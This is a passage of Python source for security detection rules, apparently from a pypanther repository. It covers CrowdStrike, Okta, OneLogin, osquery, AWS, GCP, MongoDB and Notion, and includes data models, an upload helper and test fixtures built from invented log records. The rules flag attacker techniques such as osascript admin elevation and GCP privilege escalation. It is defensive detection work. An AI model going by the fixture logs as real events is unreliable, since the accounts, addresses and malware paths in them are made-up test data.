            event, "event", "ImageFileName", default="<UNKNOWN_IMAGE_FILE_NAME>"
        )
        command_line = deep_get(event, "event", "CommandLine", default="<UNKNOWN_COMMAND_LINE>")
        return all(
            [
                event_platform == "Mac",
                event_simplename == "ProcessRollup2",
                image_filename == "/usr/bin/osascript",
                "with administrator privileges" in command_line,
            ]
        )

    def title(self, event):
        aid = event.get("aid", "<UNKNOWN_AID>")
        return f"Crowdstrike: Osascript run with administrator privileges on [{aid}]"

    def alert_context(self, event):
        return crowdstrike_process_alert_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import okta_alert_context
from pypanther.log_types import PantherLogType

okta_user_reported_suspicious_activity_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Other Event",
        ExpectedResult=False,
        Log={
            "actor": {
                "alternateId": "homer.simpson@duff.com",
                "displayName": "Homer Simpson",
                "id": "00abc123",
                "type": "User",
            },
            "authenticationcontext": {"authenticationStep": 0, "externalSessionId": "100-abc-9999"},
            "client": {
                "device": "Computer",
                "geographicalContext": {
                    "city": "Springfield",
                    "country": "United States",
                    "geolocation": {"lat": 20, "lon": -25},
                    "postalCode": "12345",
                    "state": "Ohio",
                },
                "ipAddress": "1.3.2.4",
                "userAgent": {
                    "browser": "CHROME",
                    "os": "Mac OS X",
                    "rawUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36",
                },
                "zone": "null",
            },
            "debugcontext": {
                "debugData": {
                    "requestId": "AbCdEf12G",
                    "requestUri": "/api/v1/users/AbCdEfG/lifecycle/reset_factors",
                    "url": "/api/v1/users/AbCdEfG/lifecycle/reset_factors?",
                }
            },
            "displaymessage": "Reset all factors for user",
            "eventtype": "user.mfa.factor.reset_all",
            "legacyeventtype": "core.user.factor.reset_all",
            "outcome": {"result": "SUCCESS"},
            "published": "2022-06-22 18:18:29.015",
            "request": {
                "ipChain": [
                    {
                        "geographicalContext": {
                            "city": "Springfield",
                            "country": "United States",
                            "geolocation": {"lat": 20, "lon": -25},
                            "postalCode": "12345",
                            "state": "Ohio",
                        },
                        "ip": "1.3.2.4",
                        "version": "V4",
                    }
                ]
            },
            "securitycontext": {
                "asNumber": 701,
                "asOrg": "verizon",
                "domain": "verizon.net",
                "isProxy": False,
                "isp": "verizon",
            },
            "severity": "INFO",
            "target": [
                {
                    "alternateId": "peter.griffin@company.com",
                    "displayName": "Peter Griffin",
                    "id": "0002222AAAA",
                    "type": "User",
                }
            ],
            "transaction": {"detail": {}, "id": "ABcDeFgG", "type": "WEB"},
            "uuid": "AbC-123-XyZ",
            "version": "0",
        },
    ),
    PantherRuleTest(
        Name="Suspicious Report Event",
        ExpectedResult=True,
        Log={
            "actor": {
                "alternateId": "homer.simpson@duff.com",
                "displayName": "Homer Simpson",
                "id": "00ABC123",
                "type": "User",
            },
            "authenticationcontext": {"authenticationStep": 0, "externalSessionId": "aaa1234"},
            "client": {
                "device": "Computer",
                "geographicalContext": {
                    "city": "Springfield",
                    "country": "United States",
                    "geolocation": {"lat": 30, "lon": -55},
                    "postalCode": "12345",
                    "state": "Texas",
                },
                "ipAddress": "1.2.3.4",
                "userAgent": {
                    "browser": "CHROME",
                    "os": "Mac OS X",
                    "rawUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
                },
                "zone": "null",
            },
            "debugcontext": {
                "debugData": {
                    "dtHash": "ab123542525",
                    "requestId": "A1S05S00000",
                    "requestUri": "/api/internal/users/me/report-suspicious-activity",
                    "suspiciousActivityBrowser": "SAFARI",
                    "suspiciousActivityEventCity": "Springfield",
                    "suspiciousActivityEventCountry": "United States",
                    "suspiciousActivityEventId": "aaa-123-bbb",
                    "suspiciousActivityEventIp": "9.8.7.6",
                    "suspiciousActivityEventLatitude": "30.000",
                    "suspiciousActivityEventLongitude": "-55.000",
                    "suspiciousActivityEventState": "Texas",
                    "suspiciousActivityEventTransactionId": "ABC12345",
                    "suspiciousActivityEventType": "system.email.new_device_notification.sent_message",
                    "suspiciousActivityOs": "Mac OS X (iPhone)",
                    "suspiciousActivityTimestamp": "2022-12-14T15:58:50.347Z",
                    "url": "/api/internal/users/me/report-suspicious-activity?i=aaaaaa",
                }
            },
            "displaymessage": "User report suspicious activity",
            "eventtype": "user.account.report_suspicious_activity_by_enduser",
            "legacyeventtype": "core.user.account.report_suspicious_activity_by_enduser",
            "outcome": {"result": "SUCCESS"},
            "published": "2022-12-14 15:58:58.851",
            "request": {
                "ipChain": [
                    {
                        "geographicalContext": {
                            "city": "Austin",
                            "country": "United States",
                            "geolocation": {"lat": 30, "lon": -55},
                            "postalCode": "12345",
                            "state": "Texas",
                        },
                        "ip": "9.8.7.6",
                        "version": "V4",
                    }
                ]
            },
            "securitycontext": {
                "asNumber": 11427,
                "asOrg": "charter communications inc",
                "domain": "spectrum.com",
                "isProxy": False,
                "isp": "charter communications inc",
            },
            "severity": "WARN",
            "target": [
                {
                    "alternateId": "homer.simpson@duff.com",
                    "displayName": "Homer Simpson",
                    "id": "01234",
                    "type": "User",
                }
            ],
            "transaction": {"detail": {}, "id": "1234ABC", "type": "WEB"},
            "uuid": "ABC1234",
            "version": "0",
        },
    ),
]


class OktaUserReportedSuspiciousActivity(PantherRule):
    Description = "Suspicious Activity Reporting provides an end user with the option to report unrecognized activity from an account activity email notification.\nThis detection alerts when a user marks the raised activity as suspicious."
    Reference = (
        "https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm"
    )
    DisplayName = "Okta User Reported Suspicious Activity"
    Severity = PantherSeverity.High
    LogTypes = [PantherLogType.Okta_SystemLog]
    RuleID = "Okta.User.Reported.Suspicious.Activity-prototype"
    Tests = okta_user_reported_suspicious_activity_tests

    def rule(self, event):
        return event.get("eventtype") == "user.account.report_suspicious_activity_by_enduser"

    def title(self, event):
        reported_event_type = (
            event.get("debugcontext", {})
            .get("debugData", {})
            .get("suspiciousActivityEventType", "<event-type-not-found>")
        )
        return f"Okta: [{event.get('actor', {}).get('alternateId', '<id-not-found>')}] reported suspicious account activity [{reported_event_type}]."

    def alert_context(self, event):
        return okta_alert_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

one_login_unauthorized_access_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Normal Event",
        ExpectedResult=False,
        Log={
            "event_type_id": "8",
            "user_id": 123456,
            "user_name": "Bob Cat",
            "app_name": "confluence",
        },
    ),
    PantherRuleTest(
        Name="User Unauthorized Access Event",
        ExpectedResult=True,
        Log={
            "event_type_id": "90",
            "user_id": 123456,
            "user_name": "Bob Cat",
            "app_name": "confluence",
        },
    ),
]


class OneLoginUnauthorizedAccess(PantherRule):
    RuleID = "OneLogin.UnauthorizedAccess-prototype"
    DisplayName = "OneLogin Unauthorized Access"
    LogTypes = [PantherLogType.OneLogin_Events]
    Tags = ["OneLogin", "Lateral Movement:Use Alternate Authentication Material"]
    Reports = {"MITRE ATT&CK": ["TA0008:T1550"]}
    Severity = PantherSeverity.Medium
    Description = (
        "A OneLogin user was denied access to an app more times than the configured threshold."
    )
    Threshold = 10
    DedupPeriodMinutes = 10
    Reference = "https://onelogin.service-now.com/kb_view_customer.do?sysparm_article=KB0010420"
    Runbook = "Analyze the user activity and actions."
    SummaryAttributes = ["account_id", "user_name", "user_id", "app_name"]
    Tests = one_login_unauthorized_access_tests

    def rule(self, event):
        # filter events; event type 90 is an unauthorized application access event id
        return str(event.get("event_type_id")) == "90"

    def title(self, event):
        return f"User [{event.get('user_name', '<UNKNOWN_USER>')}] has exceeded the unauthorized application access attempt threshold"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

osquery_mac_osx_attacks_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Valid malware discovered",
        ExpectedResult=True,
        Log={
            "name": "pack_osx-attacks_Leverage-A_1",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "path": "/Users/johnny/Desktop/Siri.app/Contents/MacOS/Siri",
                "pid": 100,
                "name": "Siri",
            },
        },
    ),
    PantherRuleTest(
        Name="Keyboard event taps query is ignored",
        ExpectedResult=False,
        Log={
            "name": "pack_osx-attacks_Keyboard_Event_Taps",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "path": "/System/Library/CoreServices/Siri.app/Contents/MacOS/Siri",
                "pid": 100,
                "name": "Siri",
            },
        },
    ),
]


class OsqueryMacOSXAttacks(PantherRule):
    RuleID = "Osquery.Mac.OSXAttacks-prototype"
    DisplayName = "macOS Malware Detected with osquery"
    LogTypes = [PantherLogType.Osquery_Differential]
    Tags = ["Osquery", "MacOS", "Malware", "Resource Development:Develop Capabilities"]
    Reports = {"MITRE ATT&CK": ["TA0042:T1588"]}
    Severity = PantherSeverity.Medium
    Description = "Malware has potentially been detected on a macOS system"
    Runbook = "Check the executable against VirusTotal"
    Reference = "https://github.com/osquery/osquery/blob/master/packs/osx-attacks.conf"
    SummaryAttributes = ["name", "hostIdentifier", "action"]
    Tests = osquery_mac_osx_attacks_tests

    def rule(self, event):
        if "osx-attacks" not in event.get("name", ""):
            return False
        # There is another rule specifically for this query
        if "Keyboard_Event_Taps" in event.get("name", ""):
            return False
        if event.get("action") != "added":
            return False
        return True

    def title(self, event):
        return f"MacOS malware detected on [{event.get('hostIdentifier')}]"



import argparse
import json
import logging
import os
import tempfile
import time
import zipfile
from dataclasses import asdict
from fnmatch import fnmatch
from typing import Tuple

from pypanther import testing
from pypanther.vendor.panther_analysis_tool import cli_output
from pypanther.vendor.panther_analysis_tool.backend.client import (
    BackendError,
    BulkUploadMultipartError,
    BulkUploadParams,
)
from pypanther.vendor.panther_analysis_tool.backend.client import Client as BackendClient
from pypanther.vendor.panther_analysis_tool.util import convert_unicode

IGNORE_FOLDERS = [".mypy_cache", "pypanther", "panther_analysis", ".git", "__pycache__"]


def run(backend: BackendClient, args: argparse.Namespace) -> Tuple[int, str]:
    if not args.skip_tests:
        code, err = testing.run(args)
        if code > 0:
            return code, err

    with tempfile.NamedTemporaryFile() as tmp:
        with zipfile.ZipFile(tmp, "w") as zip_out:
            logging.info(f"Writing to temporary zip file at {tmp.name}")

            for root, dir, files in os.walk("."):
                for bad in IGNORE_FOLDERS:
                    if bad in dir:
                        dir.remove(bad)

                for file in files:
                    if not fnmatch(file, "*.py"):
                        continue

                    filepath = os.path.join(root, file)

                    zip_out.write(
                        filepath,
                        arcname=filepath,
                    )
        return upload_zip(backend, args, archive=tmp.name)


def upload_zip(backend: BackendClient, args: argparse.Namespace, archive: str) -> Tuple[int, str]:
    # extract max retries we should handle
    max_retries = 10
    if args.max_retries > 10:
        logging.warning("max_retries cannot be greater than 10, defaulting to 10")
    elif args.max_retries < 0:
        logging.warning("max_retries cannot be negative, defaulting to 0")
        max_retries = 0

    with open(archive, "rb") as analysis_zip:
        logging.info("Uploading items to Panther")

        upload_params = BulkUploadParams(zip_bytes=analysis_zip.read())
        retry_count = 0

        while True:
            try:
                response = backend.async_bulk_upload(upload_params)

                resp_dict = asdict(response.data)

                logging.info("API Response:\n%s", json.dumps(resp_dict, indent=4))
                return 0, cli_output.success("Upload succeeded")

            except BackendError as be_err:
                err = cli_output.multipart_error_msg(
                    BulkUploadMultipartError.from_jsons(convert_unicode(be_err)),
                    "Upload failed",
                )
                if be_err.permanent is True:
                    return 1, f"Failed to upload to Panther: {err}"

                if max_retries - retry_count > 0:
                    logging.debug("Failed to upload to Panther: %s.", err)
                    retry_count += 1

                    # typical bulk upload takes 30 seconds, allow any currently running one to complete
                    logging.debug(
                        "Will retry upload in 30 seconds. Retries remaining: %s",
                        max_retries - retry_count,
                    )
                    time.sleep(30)

                else:
                    logging.warning("Exhausted retries attempting to perform bulk upload.")
                    return 1, f"Failed to upload to Panther: {err}"

            # PEP8 guide states it is OK to catch BaseException if you log it.
            except BaseException as err:  # pylint: disable=broad-except
                return 1, f"Failed to upload to Panther: {err}"



from typing import List

from pypanther.base import PantherDataModel, PantherDataModelMapping
from pypanther.helpers.panther_base_helpers import deep_get
from pypanther.log_types import PantherLogType


def get_dns_query(event):
    # Strip trailing period.
    # Domain Names from Crowdstrike FDR end with a trailing period, such as google.com.
    domain = deep_get(event, "event", "DomainName", default=None)
    if domain:
        domain = domain.rstrip(".")
    return domain


def get_process_name(event):
    platform = event.get("event_platform")
    # Extract process name from path
    # Win = \Device\HarddiskVolume2\Windows\System32\winlogon.exe
    # Lin = /usr/bin/run-parts
    # Mac = /usr/libexec/xpcproxy
    image_fn = deep_get(event, "event", "ImageFileName")
    if not image_fn:
        return None  # Explicitly return None if the key DNE
    if platform == "Win":
        return image_fn.split("\\")[-1]
    return image_fn.split("/")[-1]


class StandardCrowdstrikeFDR(PantherDataModel):
    DataModelID: str = "Standard.Crowdstrike.FDR"
    DisplayName: str = "Crowdstrike FDR"
    Enabled: bool = True
    LogTypes: List[str] = [PantherLogType.Crowdstrike_FDREvent]
    Mappings: List[PantherDataModelMapping] = [
        PantherDataModelMapping(Name="actor_user", Path="$.event.UserName"),
        PantherDataModelMapping(Name="cmd", Path="$.event.CommandLine"),
        PantherDataModelMapping(Name="destination_ip", Path="$.event.RemoteAddressIP4"),
        PantherDataModelMapping(Name="destination_port", Path="$.event.RemotePort"),
        PantherDataModelMapping(Name="dns_query", Method=get_dns_query),
        PantherDataModelMapping(Name="process_name", Method=get_process_name),
        PantherDataModelMapping(Name="source_ip", Path="$.aip"),
        PantherDataModelMapping(Name="source_port", Path="$.event.LocalPort"),
    ]



from typing import List

import pypanther.helpers.panther_event_type_helpers as event_type
from pypanther.base import PantherDataModel, PantherDataModelMapping
from pypanther.log_types import PantherLogType


def get_event_type(event):
    failed_login_events = ["credentials_failed", "mfa_failed", "modern_version_failed"]

    if event.get("category") == "success":
        return event_type.SUCCESSFUL_LOGIN

    if event.get("category") in failed_login_events:
        return event_type.FAILED_LOGIN

    return None


class StandardOnePasswordSignInAttempt(PantherDataModel):
    DataModelID: str = "Standard.OnePassword.SignInAttempt"
    DisplayName: str = "1Password Signin Events"
    Enabled: bool = True
    LogTypes: List[str] = [PantherLogType.OnePassword_SignInAttempt]
    Mappings: List[PantherDataModelMapping] = [
        PantherDataModelMapping(Name="actor_user", Path="$.target_user.email"),
        PantherDataModelMapping(Name="source_ip", Path="$.client.ip_address"),
        PantherDataModelMapping(Name="event_type", Method=get_event_type),
    ]



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import aws_rule_context, deep_get
from pypanther.helpers.panther_default import aws_cloudtrail_success
from pypanther.log_types import PantherLogType

awsiam_credentials_updated_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="User Password Was Changed",
        ExpectedResult=True,
        Log={
            "eventVersion": "1.05",
            "userIdentity": {
                "type": "IAMUser",
                "principalId": "AAAAIIIIIIU74NPJW5K76",
                "arn": "arn:aws:iam::123456789012:user/test_user",
                "accountId": "123456789012",
                "accessKeyId": "AAAAIIIIIIU74NPJW5K76",
                "userName": "test_user",
                "sessionContext": {
                    "attributes": {
                        "mfaAuthenticated": "true",
                        "creationDate": "2019-12-31T01:50:17Z",
                    }
                },
                "invokedBy": "signin.amazonaws.com",
            },
            "eventTime": "2019-12-31T01:50:46Z",
            "eventSource": "iam.amazonaws.com",
            "eventName": "ChangePassword",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "64.25.27.224",
            "userAgent": "signin.amazonaws.com",
            "requestParameters": None,
            "responseElements": None,
            "requestID": "a431f05e-67e1-11ea-bc55-0242ac130003",
            "eventID": "a431f05e-67e1-11ea-bc55-0242ac130003",
            "readOnly": False,
            "eventType": "AwsApiCall",
            "recipientAccountId": "123456789012",
        },
    ),
    PantherRuleTest(
        Name="MFA Device Was Created",
        ExpectedResult=False,
        Log={
            "eventVersion": "1.05",
            "userIdentity": {
                "type": "IAMUser",
                "principalId": "AAAAIIIIIIU74NPJW5K76",
                "arn": "arn:aws:iam::123456789012:user/test_user",
                "accountId": "123456789012",
                "accessKeyId": "AAAAIIIIIIU74NPJW5K76",
                "userName": "test_user",
                "sessionContext": {
                    "attributes": {
                        "mfaAuthenticated": "true",
                        "creationDate": "2019-12-31T01:50:17Z",
                    }
                },
                "invokedBy": "signin.amazonaws.com",
            },
            "eventTime": "2019-12-31T01:50:46Z",
            "eventSource": "iam.amazonaws.com",
            "eventName": "CreateVirtualMFADevice",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "64.25.27.224",
            "userAgent": "signin.amazonaws.com",
            "requestParameters": None,
            "responseElements": None,
            "requestID": "a431f05e-67e1-11ea-bc55-0242ac130003",
            "eventID": "a431f05e-67e1-11ea-bc55-0242ac130003",
            "readOnly": False,
            "eventType": "AwsApiCall",
            "recipientAccountId": "123456789012",
        },
    ),
    PantherRuleTest(
        Name="User Password Change Error",
        ExpectedResult=False,
        Log={
            "eventVersion": "1.05",
            "errorCode": "PasswordPolicyViolation",
            "userIdentity": {
                "type": "IAMUser",
                "principalId": "AAAAIIIIIIU74NPJW5K76",
                "arn": "arn:aws:iam::123456789012:user/test_user",
                "accountId": "123456789012",
                "accessKeyId": "AAAAIIIIIIU74NPJW5K76",
                "userName": "test_user",
                "sessionContext": {
                    "attributes": {
                        "mfaAuthenticated": "true",
                        "creationDate": "2019-12-31T01:50:17Z",
                    }
                },
                "invokedBy": "signin.amazonaws.com",
            },
            "eventTime": "2019-12-31T01:50:46Z",
            "eventSource": "iam.amazonaws.com",
            "eventName": "ChangePassword",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "64.25.27.224",
            "userAgent": "signin.amazonaws.com",
            "requestParameters": None,
            "responseElements": None,
            "requestID": "a431f05e-67e1-11ea-bc55-0242ac130003",
            "eventID": "a431f05e-67e1-11ea-bc55-0242ac130003",
            "readOnly": False,
            "eventType": "AwsApiCall",
            "recipientAccountId": "123456789012",
        },
    ),
]


class AWSIAMCredentialsUpdated(PantherRule):
    RuleID = "AWS.IAM.CredentialsUpdated-prototype"
    DisplayName = "New IAM Credentials Updated"
    LogTypes = [PantherLogType.AWS_CloudTrail]
    Reports = {"MITRE ATT&CK": ["TA0003:T1098"]}
    Tags = ["AWS", "Identity & Access Management", "Persistence:Account Manipulation"]
    Severity = PantherSeverity.Info
    Description = "A console password, access key, or user has been created."
    Runbook = "This rule is purely informational, there is no action needed."
    Reference = (
        "https://docs.aws.amazon.com/IAM/latest/UserGuide/list_identityandaccessmanagement.html"
    )
    SummaryAttributes = [
        "eventName",
        "userAgent",
        "sourceIpAddress",
        "recipientAccountId",
        "p_any_aws_arns",
    ]
    Tests = awsiam_credentials_updated_tests
    UPDATE_EVENTS = {"ChangePassword", "CreateAccessKey", "CreateLoginProfile", "CreateUser"}

    def rule(self, event):
        return event.get("eventName") in self.UPDATE_EVENTS and aws_cloudtrail_success(event)

    def dedup(self, event):
        return deep_get(event, "userIdentity", "userName", default="<UNKNOWN_USER>")

    def title(self, event):
        return f"{deep_get(event, 'userIdentity', 'type')} [{deep_get(event, 'userIdentity', 'arn')}] has updated their IAM credentials"

    def alert_context(self, event):
        return aws_rule_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.gcp_base_helpers import gcp_alert_context
from pypanther.helpers.panther_base_helpers import deep_get, deep_walk
from pypanther.log_types import PantherLogType

gcp_cloudfunctions_functions_update_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="privilege-escalation",
        ExpectedResult=True,
        Log={
            "protoPayload": {
                "authorizationInfo": [
                    {"granted": True, "permission": "cloudfunctions.functions.update"}
                ],
                "methodName": "v2.deploymentmanager.deployments.insert",
                "serviceName": "deploymentmanager.googleapis.com",
            },
            "receiveTimestamp": "2024-01-19 13:47:19.465856238",
            "resource": {
                "labels": {"name": "test-vm-deployment", "project_id": "panther-threat-research"},
                "type": "deployment",
            },
            "severity": "NOTICE",
            "timestamp": "2024-01-19 13:47:18.279921000",
        },
    ),
    PantherRuleTest(
        Name="fail",
        ExpectedResult=False,
        Log={
            "protoPayload": {
                "authorizationInfo": [
                    {"granted": False, "permission": "cloudfunctions.functions.update"}
                ],
                "methodName": "v2.deploymentmanager.deployments.insert",
                "serviceName": "deploymentmanager.googleapis.com",
            },
            "receiveTimestamp": "2024-01-19 13:47:19.465856238",
            "resource": {
                "labels": {"name": "test-vm-deployment", "project_id": "panther-threat-research"},
                "type": "deployment",
            },
            "severity": "NOTICE",
            "timestamp": "2024-01-19 13:47:18.279921000",
        },
    ),
]


class GCPCloudfunctionsFunctionsUpdate(PantherRule):
    RuleID = "GCP.Cloudfunctions.Functions.Update-prototype"
    DisplayName = "GCP cloudfunctions functions update"
    Description = "The Identity and Access Management (IAM) service manages authorization and authentication for a GCP environment. This means that there are very likely multiple privilege escalation methods that use the IAM service and/or its permissions."
    LogTypes = [PantherLogType.GCP_AuditLog]
    Severity = PantherSeverity.High
    Reference = (
        "https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/"
    )
    Runbook = "Confirm this was authorized and necessary behavior. This is not a vulnerability in GCP, it is a vulnerability in how GCP environment is configured, so it is necessary to be aware of these attack vectors and to defend against them. It’s also important to remember that privilege escalation does not necessarily need to pass through the IAM service to be effective. Make sure to follow the principle of least-privilege in your environments to help mitigate these security risks."
    Reports = {"MITRE ATT&CK": ["TA0004:T1548"]}
    Tests = gcp_cloudfunctions_functions_update_tests

    def rule(self, event):
        authorization_info = deep_walk(event, "protoPayload", "authorizationInfo")
        if not authorization_info:
            return False
        for auth in authorization_info:
            if (
                auth.get("permission") == "cloudfunctions.functions.update"
                and auth.get("granted") is True
            ):
                return True
        return False

    def title(self, event):
        actor = deep_get(
            event,
            "protoPayload",
            "authenticationInfo",
            "principalEmail",
            default="<ACTOR_NOT_FOUND>",
        )
        operation = deep_get(event, "protoPayload", "methodName", default="<OPERATION_NOT_FOUND>")
        project_id = deep_get(
            event, "resource", "labels", "project_id", default="<PROJECT_NOT_FOUND>"
        )
        return f"[GCP]: [{actor}] performed [{operation}] on project [{project_id}]"

    def alert_context(self, event):
        return gcp_alert_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_mongodb_helpers import mongodb_alert_context
from pypanther.log_types import PantherLogType

mongo_db_user_created_or_deleted_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Random event",
        ExpectedResult=False,
        Log={
            "created": "2023-06-07 16:57:55",
            "currentValue": {},
            "eventTypeName": "CAT_JUMPED",
            "id": "6480b7139bd8a012345ABCDE",
            "isGlobalAdmin": False,
            "links": [
                {
                    "href": "https://cloud.mongodb.com/api/atlas/v1.0/orgs/12345xyzlmnce4f17d6e8e130/events/6480b7139bd8a012345ABCDE",
                    "rel": "self",
                }
            ],
            "orgId": "12345xyzlmnce4f17d6e8e130",
            "p_event_time": "2023-06-07 16:57:55",
            "p_log_type": "MongoDB.OrganizationEvent",
            "p_parse_time": "2023-06-07 17:04:42.59",
            "p_row_id": "ea276b16216684d9e198c0d0188a3d",
            "p_schema_version": 0,
            "p_source_id": "7c3cb124-9c30-492c-99e6-46518c232d73",
            "p_source_label": "MongoDB",
            "remoteAddress": "1.2.3.4",
            "targetUsername": "insider@company.com",
            "userId": "647f654f93bebc69123abc1",
            "username": "user@company.com",
        },
    ),
    PantherRuleTest(
        Name="User joined Org",
        ExpectedResult=True,
        Log={
            "created": "2023-06-07 16:57:55",
            "currentValue": {},
            "eventTypeName": "JOINED_ORG",
            "id": "6480b7139bd8a012345ABCDE",
            "isGlobalAdmin": False,
            "links": [
                {
                    "href": "https://cloud.mongodb.com/api/atlas/v1.0/orgs/12345xyzlmnce4f17d6e8e130/events/6480b7139bd8a012345ABCDE",
                    "rel": "self",
                }
            ],
            "orgId": "12345xyzlmnce4f17d6e8e130",
            "p_event_time": "2023-06-07 16:57:55",
            "p_log_type": "MongoDB.OrganizationEvent",
            "p_parse_time": "2023-06-07 17:04:42.59",
            "p_row_id": "ea276b16216684d9e198c0d0188a3d",
            "p_schema_version": 0,
            "p_source_id": "7c3cb124-9c30-492c-99e6-46518c232d73",
            "p_source_label": "MongoDB",
            "remoteAddress": "1.2.3.4",
            "targetUsername": "insider@company.com",
            "userId": "647f654f93bebc69123abc1",
            "username": "user@company.com",
        },
    ),
    PantherRuleTest(
        Name="User removed from Org",
        ExpectedResult=True,
        Log={
            "created": "2023-06-07 16:57:55",
            "currentValue": {},
            "eventTypeName": "REMOVED_FROM_ORG",
            "id": "6480b7139bd8a012345ABCDE",
            "isGlobalAdmin": False,
            "links": [
                {
                    "href": "https://cloud.mongodb.com/api/atlas/v1.0/orgs/12345xyzlmnce4f17d6e8e130/events/6480b7139bd8a012345ABCDE",
                    "rel": "self",
                }
            ],
            "orgId": "12345xyzlmnce4f17d6e8e130",
            "p_event_time": "2023-06-07 16:57:55",
            "p_log_type": "MongoDB.OrganizationEvent",
            "p_parse_time": "2023-06-07 17:04:42.59",
            "p_row_id": "ea276b16216684d9e198c0d0188a3d",
            "p_schema_version": 0,
            "p_source_id": "7c3cb124-9c30-492c-99e6-46518c232d73",
            "p_source_label": "MongoDB",
            "remoteAddress": "1.2.3.4",
            "targetUsername": "outsider@other.com",
            "userId": "647f654f93bebc69123abc1",
            "username": "user@company.com",
        },
    ),
]


class MongoDBUserCreatedOrDeleted(PantherRule):
    Description = "User was created or deleted."
    DisplayName = "MongoDB user was created or deleted"
    Severity = PantherSeverity.Medium
    Reference = "https://www.mongodb.com/docs/v4.2/tutorial/create-users/"
    LogTypes = [PantherLogType.MongoDB_OrganizationEvent]
    RuleID = "MongoDB.User.Created.Or.Deleted-prototype"
    Tests = mongo_db_user_created_or_deleted_tests

    def rule(self, event):
        return event.deep_get("eventTypeName", default="") in ("JOINED_ORG", "REMOVED_FROM_ORG")

    def title(self, event):
        event_name = event.get("eventTypeName")
        target_username = event.get("targetUsername", "<USER_NOT_FOUND>")
        org_id = event.get("orgId", "<ORG_NOT_FOUND>")
        action = "has joined org" if event_name == "JOINED_ORG" else "was removed from org"
        return f"MongoDB Atlas: [{target_username}] {action} [{org_id}]"

    def alert_context(self, event):
        return mongodb_alert_context(event)



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_notion_helpers import notion_alert_context
from pypanther.log_types import PantherLogType


class NotionLoginFromBlockedIP(PantherRule):
    RuleID = "Notion.LoginFromBlockedIP-prototype"
    DisplayName = "Notion Login From Blocked IP"
    Enabled = False
    LogTypes = [PantherLogType.Notion_AuditLogs]
    Tags = [
        "Notion",
        "Network Security Monitoring",
        "Malicious Connections",
        "Configuration Required",
    ]
    Severity = PantherSeverity.Medium
    Description = "A user attempted to access Notion from a blocked IP address. Note: before deployinh, make sure to add Rule Filters checking if event.ip_address is in a certain CIDR range(s)."
    Runbook = (
        "Confirm with user if the login was legitimate. If so, determine why the IP is blocked."
    )
    Reference = "https://www.notion.so/help/allowlist-ip"

    def rule(self, event):
        # Users can specify inline-filters to permit rules based on IPs
        return event.deep_get("event", "type", default="<NO_EVENT_TYPE_FOUND>") == "user.login"

    def title(self, event):
        user = event.deep_get("event", "actor", "person", "email", default="<NO_USER_FOUND>")
        ip_addr = event.deep_get("event", "ip_address", default="<UNKNOWN IP>")
        return f"Notion User [{user}] attempted to login from a blocked IP: [{ip_addr}]."

    def alert_context(self, event):
        return notion_alert_context(event)



from typing import List

from pypanther.base import PantherDataModel, PantherDataModelMapping
from pypanther.log_types import PantherLogType


class StandardAWSALB(PantherDataModel):
    DataModelID: str = "Standard.AWS.ALB"
    DisplayName: str = "AWS Application Load Balancer"
    Enabled: bool = True
    LogTypes: List[str] = [PantherLogType.AWS_ALB]
    Mappings: List[PantherDataModelMapping] = [
        PantherDataModelMapping(Name="destination_ip", Path="targetIp"),
        PantherDataModelMapping(Name="source_ip", Path="clientIp"),
        PantherDataModelMapping(Name="user_agent", Path="userAgent"),
    ]



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import deep_get
from pypanther.log_types import PantherLogType

osquery_outdated_agent_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="osquery out of date",
        ExpectedResult=True,
        Log={
            "action": "added",
            "calendarTime": "Tue Sep 11 16:14:21 2018 UTC",
            "columns": {
                "build_distro": "10.12",
                "build_platform": "darwin",
                "config_hash": "1111",
                "config_valid": "1",
                "counter": "14",
                "global_state": "0",
                "extensions": "active",
                "instance_id": "1111",
                "pid": "223",
                "resident_size": "54894592",
                "start_time": "1536634519",
                "system_time": "12472",
                "user_time": "31800",
                "uuid": "37821E12-CC8A-5AA3-A90C-FAB28A5BF8F9",
                "version": "3.1.2",
                "watcher": "92",
            },
            "counter": "255",
            "decorations": {"host_uuid": "1111", "environment": "corp"},
            "epoch": "0",
            "hostIdentifier": "test.lan",
            "log_type": "result",
            "name": "pack_it-compliance_osquery_info",
            "unixTime": "1536682461",
        },
    ),
    PantherRuleTest(
        Name="osquery up to date",
        ExpectedResult=False,
        Log={
            "action": "added",
            "calendarTime": "Tue Sep 11 16:14:21 2018 UTC",
            "columns": {
                "build_distro": "10.12",
                "build_platform": "darwin",
                "config_hash": "1111",
                "config_valid": "1",
                "counter": "14",
                "global_state": "2",
                "extensions": "active",
                "instance_id": "1111",
                "pid": "223",
                "resident_size": "54894592",
                "start_time": "1536634519",
                "system_time": "12472",
                "user_time": "31800",
